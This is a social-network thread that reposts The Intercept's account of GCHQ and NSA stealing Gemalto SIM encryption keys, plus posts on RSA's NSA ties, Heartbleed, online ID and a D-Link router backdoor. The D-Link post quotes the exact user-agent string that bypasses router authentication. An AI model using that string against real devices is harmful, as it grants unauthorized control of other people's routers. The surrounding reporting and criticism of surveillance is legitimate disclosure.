But obtaining the encryption keys while Gemalto still held them required finding a way into the company’s internal systems.

Image/photo Diagram from a top-secret GCHQ slide.

TOP-SECRET GCHQ documents reveal that the intelligence agencies accessed the email and Facebook accounts of engineers and other employees of major telecom corporations and SIM card manufacturers in an effort to secretly obtain information that could give them access to millions of encryption keys. They did this by utilizing the NSA’s X-KEYSCORE program, which allowed them access to private emails hosted by the SIM card and mobile companies’ servers, as well as those of major tech corporations, including Yahoo! and Google.

In effect, GCHQ clandestinely cyberstalked Gemalto employees, scouring their emails in an effort to find people who may have had access to the company’s core networks and Ki-generating systems. The intelligence agency’s goal was to find information that would aid in breaching Gemalto’s systems, making it possible to steal large quantities of encryption keys. The agency hoped to intercept the files containing the keys as they were transmitted between Gemalto and its wireless network provider customers.

GCHQ operatives identified key individuals and their positions within Gemalto and then dug into their emails. In one instance, GCHQ zeroed in on a Gemalto employee in Thailand who they observed sending PGP-encrypted files, noting that if GCHQ wanted to expand its Gemalto operations, “he would certainly be a good place to start.” They did not claim to have decrypted the employee’s communications, but noted that the use of PGP could mean the contents were potentially valuable.

The cyberstalking was not limited to Gemalto. GCHQ operatives wrote a script that allowed the agency to mine the private communications of employees of major telecommunications and SIM “personalization” companies for technical terms used in the assigning of secret keys to mobile phone customers. Employees for the SIM card manufacturers and wireless network providers were labeled as “known individuals and operators targeted” in a top-secret GCHQ document.

According to that April 2010 document, “PCS Harvesting at Scale,” hackers working for GCHQ focused on “harvesting” massive amounts of individual encryption keys “in transit between mobile network operators and SIM card personalisation centres” like Gemalto. The spies “developed a methodology for intercepting these keys as they are transferred between various network operators and SIM card providers.” By that time, GCHQ had developed “an automated technique with the aim of increasing the volume of keys that can be harvested.”

The PCS Harvesting document acknowledged that, in searching for information on encryption keys, GCHQ operatives would undoubtedly vacuum up “a large number of unrelated items” from the private communications of targeted employees. “[H]owever an analyst with good knowledge of the operators involved can perform this trawl regularly and spot the transfer of large batches of [keys].”

The document noted that many SIM card manufacturers transferred the encryption keys to wireless network providers “by email or FTP with simple encryption methods that can be broken…or occasionally with no encryption at all.” To get bulk access to encryption keys, all the NSA or GCHQ needed to do was intercept emails or file transfers as they were sent over the internet — something both agencies already do millions of times per day. A footnote in the 2010 document observed that the use of “strong encryption products…is becoming increasingly common” in transferring the keys.

In its key harvesting “trial” operations in the first quarter of 2010, GCHQ successfully intercepted keys used by wireless network providers in Iran, Afghanistan, Yemen, India, Serbia, Iceland and Tajikistan. But, the agency noted, its automated key harvesting system failed to produce results against Pakistani networks, denoted as “priority targets” in the document, despite the fact that GCHQ had a store of Kis from two providers in the country, Mobilink and Telenor. “t is possible that these networks now use more secure methods to transfer Kis,” the document concluded.

From December 2009 through March 2010, a month before the Mobile Handset Exploitation Team was formed, GCHQ conducted a number of trials aimed at extracting encryption keys and other personalized data for individual phones. In one two-week period, they accessed the emails of 130 people associated with wireless network providers or SIM card manufacturing and personalization. This operation produced nearly 8,000 keys matched to specific phones in 10 countries. In another two-week period, by mining just 6 email addresses, they produced 85,000 keys. At one point in March 2010, GCHQ intercepted nearly 100,000 keys for mobile phone users in Somalia. By June, they’d compiled 300,000. “Somali providers are not on GCHQ’s list of interest,” the document noted. “[H]owever, this was usefully shared with NSA.”

The GCHQ documents only contain statistics for three months of encryption key theft in 2010. During this period, millions of keys were harvested. The documents stated explicitly that GCHQ had already created a constantly evolving automated process for bulk harvesting of keys. They describe active operations targeting Gemalto’s personalization centers across the globe, as well as other major SIM card manufacturers and the private communications of their employees.

A top-secret NSA document asserted that, as of 2009, the U.S. spy agency already had the capacity to process between 12 and 22 million keys per second for later use against surveillance targets. In the future, the agency predicted, it would be capable of processing more than 50 million per second. The document did not state how many keys were actually processed, just that the NSA had the technology to perform such swift, bulk operations. It is impossible to know how many keys have been stolen by the NSA and GCHQ to date, but, even using conservative math, the numbers are likely staggering.

GCHQ assigned “scores” to more than 150 individual email addresses based on how often the users mentioned certain technical terms, and then intensified the mining of those individuals’ accounts based on priority. The highest scoring email address was that of an employee of Chinese tech giant Huawei, which the U.S. has repeatedly accused of collaborating with Chinese intelligence. In all, GCHQ harvested the emails of employees of hardware companies that manufacture phones, such as Ericsson and Nokia; operators of mobile networks, such as MTN Irancell and Belgacom; SIM card providers, such as Bluefish and Gemalto; and employees of targeted companies who used email providers such as Yahoo! and Google. During the three-month trial, the largest number of email addresses harvested were those belonging to Huawei employees, followed by MTN Irancell. The third largest class of emails harvested in the trial were private Gmail accounts, presumably belonging to employees at targeted companies.

The GCHQ program targeting Gemalto was called DAPINO GAMMA. In 2011, GCHQ launched operation HIGHLAND FLING to mine the email accounts of Gemalto employees in France and Poland. A top-secret document on the operation stated that one of the aims was “getting into French HQ” of Gemalto “to get in to core data repositories.” France, home to one of Gemalto’s global headquarters, is the nerve center of the company’s worldwide operations. Another goal was to intercept private communications of employees in Poland that “could lead to penetration into one or more personalisation centers” — the factories where the encryption keys are burned onto SIM cards.

As part of these operations, GCHQ operatives acquired the usernames and passwords for Facebook accounts of Gemalto targets. An internal top-secret GCHQ wiki on the program from May 2011 indicated that GCHQ was in the process of “targeting” more than a dozen Gemalto facilities across the globe, including in Germany, Mexico, Brazil, Canada, China, India, Italy, Russia, Sweden, Spain, Japan and Singapore.

The document also stated that GCHQ was preparing similar key theft operations against one of Gemalto’s competitors, Germany-based SIM card giant Giesecke and Devrient.

On January 17, 2014, President Barack Obama gave a major address on the NSA spying scandal. “The bottom line is that people around the world, regardless of their nationality, should know that the United States is not spying on ordinary people who don’t threaten our national security and that we take their privacy concerns into account in our policies and procedures,” he said.

The monitoring of the lawful communications of employees of major international corporations shows that such statements by Obama, other U.S. officials and British leaders — that they only intercept and monitor the communications of known or suspected criminals or terrorists — were untrue. “The NSA and GCHQ view the private communications of people who work for these companies as fair game,” says the ACLU’s Soghoian. “These people were specifically hunted and targeted by intelligence agencies, not because they did anything wrong, but because they could be used as a means to an end.”

Image/photo



THERE ARE TWO basic types of electronic or digital surveillance: passive and active. All intelligence agencies engage in extensive passive surveillance, which means they collect bulk data by intercepting communications sent over fiber optic cables, radio waves or wireless devices.

Intelligence agencies place high power antennas, known as “spy nests,” on the top of their countries’ embassies and consulates, which are capable of vacuuming up data sent to or from mobile phones in the surrounding area. The joint NSA/CIA Special Collection Service is the lead entity that installs and mans these nests for the United States. An embassy situated near a parliament or government agency could easily intercept the phone calls and data transfers of the mobile phones used by foreign government officials. The U.S. embassy in Berlin, for instance, is located a stone’s throw from the Bundestag. But if the wireless carriers are using stronger encryption, which is built into modern 3G, 4G and LTE networks, then intercepted calls and other data would be more difficult to crack, particularly in bulk. If the intelligence agency wants to actually listen to or read what is being transmitted, they would need to decrypt the encrypted data.

Active surveillance is another option. This would require government agencies to “jam” a 3G or 4G network, forcing nearby phones onto 2G. Once forced down to the less secure 2G technology, the phone can be tricked into connecting to a fake cell tower operated by an intelligence agency. This method of surveillance, though effective, is risky, as it leaves a digital trace that counter-surveillance experts from foreign governments could detect.

Stealing the Kis solves all of these problems. This way, intelligence agencies can safely engage in passive, bulk surveillance without having to decrypt data and without leaving any trace whatsoever.

“Key theft enables the bulk, low-risk surveillance of encrypted communications,” the ACLU’s Soghoian says. “Agencies can collect all the communications and then look through them later. With the keys, they can decrypt whatever they want, whenever they want. It’s like a time machine, enabling the surveillance of communications that occurred before someone was even a target.”

Neither the NSA nor GCHQ would comment specifically on the key theft operations. In the past, they have argued more broadly that breaking encryption is a necessary part of tracking terrorists and other criminals. “It is longstanding policy that we do not comment on intelligence matters,” a GCHQ official stated in an email, adding that the agency’s work is conducted within a “strict legal and policy framework” that ensures its activities are “authorized, necessary and proportionate,” with proper oversight, which is the standard response the agency has provided for previous stories published by [i]The Intercept
. The agency also said, “[T]he UK’s interception regime is entirely compatible with the European Convention on Human Rights.” The NSA declined to offer any comment.

It is unlikely that GCHQ’s pronouncement about the legality of its operations will be universally embraced in Europe. “It is governments massively engaging in illegal activities,” says Sophie in’t Veld, a Dutch member of the European Parliament. “If you are not a government and you are a student doing this, you will end up in jail for 30 years.” Veld, who chaired the European Parliament’s recent inquiry into mass surveillance exposed by Snowden, told The Intercept: “The secret services are just behaving like cowboys. Governments are behaving like cowboys and nobody is holding them to account.”

The Intercept’s Laura Poitras has previously reported that in 2013 Australia’s signals intelligence agency, a close partner of the NSA, stole some 1.8 million encryption keys from an Indonesian wireless carrier.

A few years ago, the FBI reportedly dismantled several of transmitters set up by foreign intelligence agencies around the Washington DC area, which could be used to intercept cell phone communications. Russia, China, Israel and other nations use similar technology as the NSA across the world. If those governments had the encryption keys for major U.S. cell phone companies’ customers, such as those manufactured by Gemalto, mass snooping would be simple. “It would mean that with a few antennas placed around Washington DC, the Chinese or Russian governments could sweep up and decrypt the communications of members of Congress, U.S. agency heads, reporters, lobbyists and everyone else involved in the policymaking process and decrypt their telephone conversations,” says Soghoian.

“Put a device in front of the UN, record every bit you see going over the air. Steal some keys, you have all those conversations,” says Green, the Johns Hopkins cryptographer. And it’s not just spy agencies that would benefit from stealing encryption keys. “I can only imagine how much money you could make if you had access to the calls made around Wall Street,” he adds.

Image/photo GCHQ slide.

THE BREACH OF Gemalto’s computer network by GCHQ has far-reaching global implications. The company, which brought in $2.7 billion in revenue in 2013, is a global leader in digital security, producing banking cards, mobile payment systems, two-factor authentication devices used for online security, hardware tokens used for securing buildings and offices, electronic passports and identification cards. It provides chips to Vodafone in Europe and France’s Orange, as well as EE, a joint venture in the U.K. between France Telecom and Deutsche Telekom. Royal KPN, the largest Dutch wireless network provider, also uses Gemalto technology.

In Asia, Gemalto’s chips are used by China Unicom, Japan’s NTT and Taiwan’s Chungwa Telecom, as well as scores of wireless network providers throughout Africa and the Middle East. The company’s security technology is used by more than 3,000 financial institutions and 80 government organizations. Among its clients are Visa, Mastercard, American Express, JP Morgan Chase and Barclays. It also provides chips for use in luxury cars, including those made by Audi and BMW.

In 2012, Gemalto won a sizable contract, worth $175 million, from the U.S. government to produce the covers for electronic U.S. passports, which contain chips and antennas that can be used to better authenticate travelers. As part of its contract, Gemalto provides the personalization and software for the microchips implanted in the passports. The U.S. represents Gemalto’s single largest market, accounting for some 15 percent of its total business. This raises the question of whether GCHQ, which was able to bypass encryption on mobile networks, has the ability to access private data protected by other Gemalto products created for banks and governments.

As smart phones become smarter, they are increasingly replacing credit cards and cash as a means of paying for goods and services. When Verizon, AT&T and T-Mobile formed an alliance in 2010 to jointly build an electronic pay system to challenge Google Wallet and Apple Pay, they purchased Gemalto’s technology for their program, known as Softcard. (Until July 2014, it previously went by the unfortunate name of “ISIS Mobile Wallet.”) Whether data relating to that, and other Gemalto security products, has been compromised by the GCHQ and NSA is unclear. Both intelligence agencies declined to answer any specific questions for this story.

Image/photo Signal, iMessage, WhatsApp, Silent Phone.

PRIVACY ADVOCATES and security experts say it would take billions of dollars, significant political pressure, and several years to fix the fundamental security flaws in the current mobile phone system that NSA, GCHQ and other intelligence agencies regularly exploit.

A current gaping hole in the protection of mobile communications is that cell phones and wireless network providers do not support the use of Perfect Forward Security (PFS), a form of encryption designed to limit the damage caused by theft or disclosure of encryption keys. PFS, which is now built into modern web browsers and used by sites like Google and Twitter, works by generating unique encryption keys for each communication or message, which are then discarded. Rather than using the same encryption key to protect years’ worth of data, as the permanent Kis on SIM cards can, a new key might be generated each minute, hour or day, and then promptly destroyed. Because cell phone communications do not utilize PFS, if an intelligence agency has been “passively” intercepting someone’s communications for a year and later acquires the permanent encryption key, it can go back and decrypt all of those communications. If mobile phone networks were using PFS, that would not be possible — even if the permanent keys were later stolen.

The only effective way for individuals to protect themselves from Ki theft-enabled surveillance is to use secure communications software, rather than relying on SIM card-based security. Secure software includes email and other apps that use Transport Layer Security (TLS), the mechanism underlying the secure HTTPS web protocol. The email clients included with Android phones and iPhones support TLS, as do large email providers like Yahoo! and Google.

Apps like TextSecure and Silent Text are secure alternatives to SMS messages, while Signal, RedPhone and Silent Phone encrypt voice communications. Governments still may be able to intercept communications, but reading or listening to them would require hacking a specific handset, obtaining internal data from an email provider, or installing a bug in a room to record the conversations.

“We need to stop assuming that the phone companies will provide us with a secure method of making calls or exchanging text messages,” says Soghoian.

———

Documents published with this article:———

Additional reporting by Andrew Fishman and Ryan Gallagher. Sheelagh McNeill, Morgan Marquis-Boire, Alleen Brown, Margot Williams, Ryan Devereaux and Andrea Jones contributed to this story.

The post How Spies Stole the Keys to the Encryption Castle appeared first on The Intercept.


#Snowden #Encryption #Privacy #Spies #Spying #NSA #GCHQ #Snooping #Surveillance #Communications #Security @LibertyPod+ @Gadget Guru+

Seth Martin
  last edited: Mon, 13 Oct 2014 13:14:18 -0500  
Why privacy matters

Image/photo



Glenn Greenwald was one of the first reporters to see -- and write about -- the Edward Snowden files, with their revelations about the United States' extensive surveillance of private citizens. In this searing talk, Greenwald makes the case for why you need to care about privacy, even if you’re “not doing anything you need to hide."


#Greenwald #Snowden #Privacy #NSA #Surveillance #Spying #Freedom #Security @LibertyPod+
Seth Martin
  last edited: Sun, 25 May 2014 11:54:50 -0500  
Yet another reason to completely switch to open-source, decentralized and distributed communications and content management methods such as the red#, Friendica and XMPP/Jabber.

#^FBI: We need wiretap-ready Web sites - now - CNET

Image/photo

CNET learns the FBI is quietly pushing its plan to force surveillance backdoors on social networks, VoIP, and Web e-mail providers, and that the bureau is asking Internet companies not to oppose a law making those backdoors mandatory.


#CALEA #Wiretapping #Social Networking #Communications #Privacy #FCC #FBI #Surveillance #Security #Backdoors #Snooping #RedMatrix #Friendica #XMPP @LibertyPod+

Seth Martin
  last edited: Sat, 03 May 2014 17:28:17 -0500  
It appears the status quo may be finally making its moves to getting control over the heretofore free and open internet.

There's already an open-source, decentralized, single sign-on solution via the Zot protocol in use by the r# today.

The White House Wants to Issue You an Online ID

Image/photo

A few years back, the White House had a brilliant idea: Why not create a single, secure online ID that Americans could use to verify their identity across multiple websites, starting with local government services. The New York Times described it at the time as a "driver's license for the internet."

#Single Sign-On #Internet #Security #Privacy #Passwords #Authentication #Zot #RedMatrix #Online ID #Internet ID @LibertyPod+
Mike Macgirvin
  
Netscape Introduces Netscape Navigator 2.0

To use secure email and other client authentication capabilities, Netscape Navigator 2.0 users will be able to obtain digital certificates from Netscape partners such as VeriSign, Inc. Digital certificates serve as a user's secure "Internet driver's license", identifying the user through public key encryption technology for secure mail and other applications. For users who desire a listing, Netscape will maintain a directory of email names and public keys so that other users can send secure mail to them.
Mike Macgirvin
  
The thing that most people instinctively "get" is that he who owns identity on the internet owns the internet. That's why I feel it so important to have identity on the internet which is decentralised and cannot be owned. But most people haven't thought that far ahead. Centralised identity will solve a lot of problems and the forces of complete control of everything will eventually get it.. That is unless we show that our decentralised solution is viable and fixes everything that will go wrong with centralised identity - before it even gets off the ground.

What we don't have is people who understand what control of identity is all about and are willing to fight for freedom. They're too busy complaining about shit that doesn't matter in the bigger picture - like whether or not they've got a link that does 'x'. or their link that does 'y' is off by a few pixels from where it should be.

The EFF has had a few days and haven't responded to mys calls for how to work together with DoNotTrack assuming we need third party cookies for the Matrix and decentalised identity to survive and they are opposed to third-party cookies.

So we're probably doomed.
zottel
  last edited: Mon, 05 May 2014 07:37:40 -0500  
Such a thing is already available since 2010 in Germany. Current ID cards sport an RFID chip, and with a reader that you can connect to the PC, you can identify yourself. To some app on the computer, or in the internet. Or at an airport terminal, to the police etc.

It's theoretically done rather smartly, i.e. there's always a PIN required before data can be read (except if the authorities read it, of course), and any app that wants to read certain fields has to present a certificate that entitles it to, which is provided by the state.

There is also a "pseudonym" function which tells some ID to the company that reads it and thus allows identifying a recurring customer. As every company is served a different ID, it cannot be used to track users outside a single business. (Only theoretically, of course, because they'd just have to outsource that to a third party that is used by many businesses, but still.) For age verification, companies can ask the chip if the owner is over 18, e.g., without the owner having to reveal his actual birth date. Or they can ask if a location where someone lives that was given is correct, without having the possibility to read the data itself.

It's also designed in a way (or least said to be so) that without entering a PIN, the RFID chip, even if it gets near enough to a reader to be contacted, will never spit out anything that can be tracked, i.e. an always same serial number or something that could be used by shop owners to track their customers.

If you upload a certificate to the chip that you could (theoretically) buy from a cert provider, you can use the ID card to digitally sign documents.

There is also biometric data on the chip that can only be read by the authorities with the corresponding certs, consisting of (or only including?) fingerprint scans, which have been made optional for the ID cards, though (different from the passports).

This electronic ID card was introduced with a lot of publicity, depicted as the revolutionary new form of identity proof that everyone would use in the internet from now on. A few thousand RFID readers were even given out for free, though these were the insecure ones without a pinpad (yay!).

The actual outcome was that most people didn't want or need something like that. During a grace period, nearly everyone tried to get the old kind of ID card without RFID chip instead of the new one. Now you don't have a choice anymore; when my ID card runs out next January, I'll have to get the RFID one. Which is much more expensive than the old one, of course.

To my knowledge, there is no company that would offer digital signature services with the ID card. No internet services that use it, either.

I think you can use it when you digitally send your tax declaration, but I'm not sure even about that.

A lot of expensive technology that goes mostly unused.

Seth Martin
  last edited: Sun, 08 Jun 2014 13:47:02 -0500  
NSA Said to Exploit Heartbleed Bug for Intelligence for Years

The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.


#NSA #Spying #Privacy #Surveillance #Heartbleed #Bug #SSL #OpenSSL #Security @LibertyPod+

Seth Martin
  last edited: Mon, 31 Mar 2014 13:15:51 -0500  
The U.S. National Security Agency managed to have security firm RSA adopt not just one, but two security tools, further facilitating NSA eavesdropping on Internet communications. The newly discovered software is dubbed 'Extended Random', and is intended to facilitate the use of the already known 'Dual Elliptic Curve' encryption software's back door. Researchers from several U.S. universities discovered Extended Random and assert it could help crack Dual Elliptic Curve encrypted communications 'tens of thousands of times faster'.

Exclusive: NSA infiltrated RSA security more deeply than thought - study

Image/photo

SAN FRANCISCO (Reuters) - Security industry pioneer RSA adopted not just one but two encryption tools developed by the U.S. National Security Agency, greatly increasing the spy agency's ability to eavesdrop on some Internet communications, according to a team of academic researchers.


#NSA #Spying #Snooping #Liberty #Infiltration #Privacy #RSA #Encryption #Security #Surveillance #Computer Security @LibertyPod
Mike Macgirvin
  
The general concensus was that dual elliptic curve was dead the second the first revelations came out.

Seth Martin
  
Exclusive: Secret contract tied NSA and security industry pioneer

Image/photo

SAN FRANCISCO (Reuters) - As a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry, Reuters has learned.


#RSA #Bsafe #Backdoor #Encryption #NSA #Spying #Snooping #Snowden #Computer Security #Privacy #Freedom #Liberty #Security @LibertyPod

Seth Martin
  
We've seen it argued that privacy is a bad thing. People like former DHS official Stewart Baker have argued that the privacy-protecting efforts of civil liberties activists are the reason we're forced to be fondled and de-shod at TSA checkpoints. Not only that, he's tried to blame the 9/11 attacks on "rise of civil libertarianism." Unbelievably, we've also had a politician recently claim that your privacy isn't violated if you don't notice the violation.

We've also seen attacks on anonymity by (anonymous) police officers and a whole slew of pundits and politicians who believe the only thing online anonymity does is provide a shield for trolls, bullies and pirates to hide behind. Efforts have been made to outlaw online anonymity, but fortunately, very few laws have been passed.

Now, try wrapping your mind around this argument being made by Art Coviello, executive chairman of RSA Security and the head of EMC's security division. According to him, anonymity and privacy are at odds with each other.

A dogmatic allegiance to anonymity is threatening privacy, according to Art Coviello, executive chairman of RSA.

Coviello cast anonymity as the "enemy of privacy" because it gives "free reign to our networks to adversaries" with "no risk of discovery or prosecution."


On one hand, anonymity is slowing down the pursuit of online criminals. On the other hand, companies are increasingly wary of subjecting their employees to intrusive security software.

Customers are caught in a Catch-22. They're afraid to deploy technology for fear of violating workers' privacy" even though security intelligence tools are ultimately the best way to protect personal information, Coviello argued.


How Coviello arrives at the conclusion that anonymity is damaging privacy isn't exactly clear. It may be the enemy to security (or at least, unhelpful to retributive actions), but the online anonymity shielding crooks doesn't threaten users' privacy, at least not directly. Indirectly it could, but it wouldn't be anonymity's "fault." If Coviello wants attackers to be stripped of anonymity, there's little doubt he'd like to see clients' employees stripped of their privacy. Both would make his companies' jobs easier. Attackers would be easily identified and clients would received (arguably) better protection (thanks to more, non-anonymized data gathering). Win-win for security. Not so much for those who cherish privacy and anonymity.

This isn't exactly new ground for Coviello. He did some complaining about privacy at last year's RSA conference as well.

RSA executive chairman Art Coviello has criticised privacy advocates for basing their arguments on “dangerous reasoning”, comments that have already earned him a tongue lashing from Big Brother Watch and the Open Rights Group.

Coviello, whilst noting the need for privacy, lambasted privacy groups’ “knee jerk” reactions to public and private sector attempts to improve people’s security, pointing to the “insanity” of the situation, in a keynote to open the RSA 2012 conference in London this morning.
In Coviello’s view, privacy advocates are over-reacting to measures designed to protect online identities, preferring to live in a world of danger: “Because privacy advocates don’t realise that safeguards can be implemented, they think we must expect reasonable danger to protect our freedoms,” Coviello said.

“But this is based on dangerous reasoning, a knee jerk reaction, without understanding the severity and scope of the problem.

“Where is it written that cyber criminals can steal our identities but any industry action to protect us invites cries of Big Brother.”


Not for nothing has someone noted that RSA is only a letter away from the United States' most notorious intelligence agency.

Coviello's arguments here aren't that much different than the government's opinions on the "liberty vs. security" balance. And like other defenders of intrusive programs, Coviello refers to the statements of critics as an "over-reaction." But is it? He bristles at being compared to Big Brother but his thought processes roughly align with the government's foremost proponents of intrusive programs. According to both, people just don't understand how bad things actually are, and in our unenlightened state, we're making the wrong choice between security and liberty.

Additionally, the "knee jerk reaction" he sees in privacy activists is, in reality, no different than the knee jerk reactions he fails to see in security and intelligence entities. While privacy activists are focused on retaining what's remaining and make small pushes for more, security/intelligence agencies leverage every tragedy or attack to expand their scope and dial back privacy protections.

But where his argument against privacy (and anonymity) ultimately falls apart is in his belief that collecting and storing large amounts of private data is the best solution for all involved.

To “suggest the only way to protect against cyber crime is to sacrifice privacy and civil liberties is absurd,” Nick Pickles, director of privacy campaign group Big Brother Watch, told TechWeekEurope. “It is a simple fact that if data has not been collected, it cannot be stolen, lost or misused. The best safeguard for consumers and businesses is for data not to be collected unless it is absolutely essential, and then deleted as soon as it is no longer required.”


As for his complaints about anonymity? It's pretty much all or nothing. You can't whip up statutes and laws that allow anonymity and their privacy protections unless you're a criminal. Either you take the good with the bad or you eliminate it for everybody. No one's going to agree with that last one, so security groups and companies will just have to deal with the fact that their adversaries will be cloaking their identities. Cops may wish robbers wouldn't wear masks when committing crime, but that's the way it goes. You can't ban the sale of masks simply because someone holds up a bank wearing one.

I'm sure he understands this, but he's in a field where security is valued over privacy. But that's the expected mindset for someone is his position. The problem is that those with his mindset expect others to come to the same conclusion -- and when they don't, they're portrayed as part of the problem.

To be fair, Coviello at least had this to say about the jargon being deployed by government security officials and advisors.

"I absolutely hate the term 'Cyber Pearl Harbor'," he said. "I just think it's a poor metaphor to describe the state we are really in. What do I do differently once I've heard it? And I've been hearing it for 10 years now. To trigger a physically destructive event solely from the internet might not be impossible, but it is still, as of today, highly unlikely."


Coviello may not like this particular FUD, but claiming anonymity and privacy are standing in the way of security isn't that far removed from the panicky assertions of the "cyber Pearl Harbor" types.

Source

#Anonymity #Privacy #Freedom #Liberty #RSA #Encryption #Security #Intelligence @LibertyPod
Sean Tilley
  
WAR IS PEACE
FREEDOM IS SLAVERY
IGNORANCE IS STRENGTH

Seth Martin
  last edited: Tue, 22 Oct 2013 13:00:26 -0500  
Call Yourself A Hacker, Lose Your 4th Amendment Rights

Image/photo

The US District Court for the State of Idaho ruled that an ICS product developer’s computer could be seized without him being notified or even heard from in court primarily because he states on his web site “we like hacking things and don’t want to stop”.


#Hacker #Hacking #Cybersecurity #National Security #Visdom #Southfork Security #Seizure #Privacy #Security #Constitution #Rights @LibertyPod

Seth Martin
  
After seeing news of a D-Link backdoor over the last couple of days, I finally decided to check it out. The backdoor, if used, would let an attacker take complete control of a router or modem and spy on a home's browsing activity.
Reverse Engineering a D-Link Backdoor - /dev/ttyS0


Image/photo

In other words, if your browser’s user agent string is “xmlset_roodkcableoj28840ybtide” (no quotes), you can access the web interface without any authentication and view/change the device settings


#Reverse Engineering #D-Link #Router #Security #Fail #Backdoor #Spying #Spy
Arto
  
Sneaky, criminal bastards.
Thomas Willingham
  
I do stuff like this quite a lot.  Take an argument from the URL in some conditional and debugging is a lot quicker at the expense of a slightly longer testing process when it's removed.

This strikes me as something similar.  I mean, it's not exactly clever.  I'd be inclined to give them the benefit of the doubt if they called this a bug.  

It's still incompetent.  I still wouldn't use their hardware, but I don't think this is a deliberate backdoor for spying....if I was going for a deliberate backdoor for spying, it'd be a lot more subtle than that.
Haakon Meland Eriksen
  
The explanation by the article author is very good. :-)
Arto
 
Indeed!